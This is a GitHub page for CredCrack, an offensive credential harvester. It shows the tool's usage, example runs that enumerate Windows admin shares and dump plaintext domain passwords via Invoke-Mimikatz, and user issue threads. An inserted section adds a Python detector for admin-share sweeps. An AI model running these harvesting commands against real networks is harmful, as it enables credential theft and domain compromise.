credcrack's Introduction

CredCrack

⛔ [DEPRECATED] This repo is no longer being maintained. Please consider using CrackMapExec.

Introduction


CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recursively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack can also list and enumerate share access and yes, it is threaded!

CredCrack has been tested with, and runs on, the tools found natively in Kali Linux. It relies solely on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Invoke-Mimikatz can be downloaded from the PowerSploit project.

Help


usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples


Enumerating Share Access

./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s
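
A defender's view of the run above, added here and not part of CredCrack or its README: the sketch below flags one source and account touching administrative shares (ADMIN$, C$ and other drive shares) on several hosts within a short window. The log layout is a constructed simplification modelled on Windows Security event 5140 (network share object accessed); the field order, thresholds and sample records are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not from the page), one access per line:
# time, host that logged the access, source IP, account, share name.
SAMPLE_LOG = r"""
2024-01-10T09:00:00 192.168.1.102 192.168.1.50 ACME\bob \\*\ADMIN$
2024-01-10T09:00:00 192.168.1.102 192.168.1.50 ACME\bob \\*\C$
2024-01-10T09:00:00 192.168.1.103 192.168.1.50 ACME\bob \\*\ADMIN$
2024-01-10T09:00:01 192.168.1.103 192.168.1.50 ACME\bob \\*\F$
2024-01-10T09:00:01 192.168.1.100 192.168.1.50 ACME\bob \\*\SYSVOL
2024-01-10T09:00:01 192.168.1.100 192.168.1.50 ACME\bob \\*\C$
2024-01-10T09:05:00 192.168.1.100 192.168.1.77 ACME\alice \\*\SYSVOL
2024-01-10T09:30:00 192.168.1.102 192.168.1.88 ACME\helpdesk \\*\C$
2024-01-10T11:30:00 192.168.1.103 192.168.1.88 ACME\helpdesk \\*\C$
2024-01-10T14:30:00 192.168.1.100 192.168.1.88 ACME\helpdesk \\*\C$
"""

# ADMIN$ or a single-letter drive share (C$, F$, ...); SYSVOL, NETLOGON, IPC$ do not match.
ADMIN_SHARE = re.compile(r"\\(?:ADMIN|[A-Z])\$$", re.IGNORECASE)


def parse(log):
    """Yield (time, host, source_ip, account, share) from the simplified log."""
    for line in log.strip().splitlines():
        ts, host, src, account, share = line.split()
        yield datetime.fromisoformat(ts), host, src, account, share


def find_admin_share_sweeps(log, window_s=60, min_hosts=3):
    """Return (source_ip, account, hosts) for each source/account pair that
    reached admin shares on at least min_hosts hosts within window_s seconds."""
    by_source = defaultdict(list)
    for ts, host, src, account, share in parse(log):
        if ADMIN_SHARE.search(share):
            by_source[(src, account)].append((ts, host))
    findings = []
    window = timedelta(seconds=window_s)
    for (src, account), hits in sorted(by_source.items()):
        hits.sort()
        for i, (start, _) in enumerate(hits):
            hosts = {h for t, h in hits[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                findings.append((src, account, sorted(hosts)))
                break
    return findings
```

With the default window, only the burst from 192.168.1.50 is reported; the helpdesk account's accesses are hours apart and stay below the threshold.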

Harvesting credentials


./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

                
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Contact

Contact me at @g0jhonny with any questions or features you'd like to see in the next update. For bugs submit an issue!

Credits

CredCrack couldn't have been possible without the contributions of the following individuals. You're all rockstars! @JosephBialek, @brav0hax, @altonjx and everyone else! Thank you for all your contributions and feedback to make this a better script, keep 'em coming!

credcrack's People

Contributors

bryant1410, jobroche, r3dy

credcrack's Issues

Standalone servers

Hi Jonathan,

First of all thanks for your great piece of software.
I tried credcrack on a standalone Windows 2008 R2 server that is not part of a domain and received the following error:

[!] User is not an admin on 10.0.1.51 or the system is not joined to a domain

The command I ran:
./credcrack.py -r 10.0.1.51 -d WORKGROUP -u administrator -l 10.0.1.20

So the question is why is it not possible to run credcrack on standalone servers?

[Errno 2] No such file or directory

./credcrack.py -d domain -u user -es -r 10.10.10.1


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[*] Validating 10.10.10.1
[!] Error listing shares on 10.10.10.1: [Errno 2] No such file or directory

I always get the same error whatever options I use.
Is there a dependency I'm missing?

I've tried with "-F hosts"
but I got the same message with all the IP addresses.
I've tried with a wrong password and it tells me the same...

Any idea?
Do I need to be on Kali?
I have CentOS 7
;)

ValueError: zero length field name in format

Hello, I get an error when I execute the script:

ValueError: zero length field name in format

My Python version is 2.6.6. I executed this command line:

./credcrack.py -d XXX -u XXX -f hosts -es

My exact error:

Traceback (most recent call last)
File "./credcrack.py", line 415,
main()
File "./credcrack.py", line 411, in main
print "{}[!]{} File: {} does not exist.".format(colors.red, colors.normal, args.file)
ValueError: zero length field name in format

Sorry for my bad English and thank you very much

Unable to reach

Hi,
thank you for your great work.

I get this error when I use credcrack.py

root@kali:~/Downloads/CredCrack-master# ./credcrack.py -d domaine -u user -f ip -l 10.247.192.217
Password:


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[*] Setting up the stage
[*] Validating 10.247.192.200
[*] Validating 10.247.192.192
[*] Validating 10.247.192.182
[*] Querying domain admin group from 10.247.192.200
[!] Unable to reach to 10.247.192.200
[*] Querying domain admin group from 10.247.192.192
[!] Unable to reach to 10.247.192.192
[*] Querying domain admin group from 10.247.192.182
[!] Unable to reach to 10.247.192.182

Do you have any idea how to resolve this, please?

thank you !

Online documentation is not updated

I'm reading the (online) documentation and it says only domain and user are required. From what I see, the local host and the remote host are also required.

Also, the documentation is kind of sketchy on exactly which parameters are needed and what they are for.

Servers with different languages fail

Hi John,

Today I used credcrack on a Dutch Windows Server 2008 R2 installation and it fails because CredCrack can't query the Domain Admins group.

On a Dutch Windows Server 2008 R2 installation the group name is "Domeinadministrators". I guess this Domain Admins group is different on all other Windows Server installations that use a language other than English.

It might be an idea to gather all those group names and make an option for it in CredCrack?

Some more info:

The error message I receive from $output:

[*] Setting up the stage
[*] Validating 192.168.178.23
[*] Querying domain admin group from 192.168.178.23

Kan de groepsnaam niet vinden.

Typ NET HELPMSG 2220 voor meer hulp.

[!] User is not an admin on 192.168.178.23 or the system is not joined to a domain

Translated:

Can't find group name.
Type NET HELPMSG 2220 for more help.

no shell no error message

What could be the problem if I just got this:

root@kali:~/CredCrack# ./credcrack.py -d workgroup -r 192.168.122.237 -u Christian -l 192.168.122.25
Password:


CredCrack v1.0 by Jonathan Broche (@g0jhonny)


[*] Setting up the stage
[*] Validating 192.168.122.237
[*] Querying domain admin group from 192.168.122.237
[*] Cleaning up
root@kali:~/CredCrack#

The "list shares" works. Thank you

No loot?

Hello,

I have been playing around with credcrack on a domain. I can validate the hosts with no issue. Yet when I go to harvest details, it always comes back with no loot. There are members in the "domain admins" group. There are two screenshots below showing the information.

http://puu.sh/lqnfQ/5a924e0d25.jpg (Validating Hosts)
http://puu.sh/lqngY/bdc4a46775.jpg (Harvesting)

Any ideas on why this is not working?

Thanks.

Output to file does not reflect the domain admins

When sending standard output to file in linux, highlights like yellow are not reflected in the output file.
Perhaps give a text clue to which credentials are domain admins, like (!) before the line. This way, when running this script and reviewing later from a file, the domain admins can still be identified.
